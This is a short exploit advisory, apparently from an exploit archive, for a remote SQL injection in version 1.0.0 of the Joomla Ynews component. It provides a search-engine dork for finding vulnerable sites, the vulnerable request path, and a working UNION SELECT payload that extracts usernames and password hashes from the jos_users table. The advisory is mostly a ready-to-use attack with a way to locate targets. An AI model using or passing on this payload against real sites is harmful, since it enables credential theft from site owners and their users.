The Joomla Ynews component version 1.0.0 suffers from a remote SQL injection vulnerability.
d4a4d1938055d31983dd1a599ac58c8f616be4a584b14a304ae539585354c502
###########################################################################################
### Title : Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
###
### Author : By Crackers_Child cashr00t@hotmail.com
###
### Greetz : Str0ke,www.biyofrm.com & www.sibersavascilar.com & www.tryag.cc
###
### Dork : inurl:index.php?option=com_ynews
###
### Exploit : /index.php?option=com_ynews&Itemid=0&task=showYNews&id=SQL
###
### SQL : -1/**/union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*
###
### Note : Kac Kere ölDunuz ki " Olum Den Korkmuyorum Ben " Diyebiliyorsunuz . . .
###########################################################################################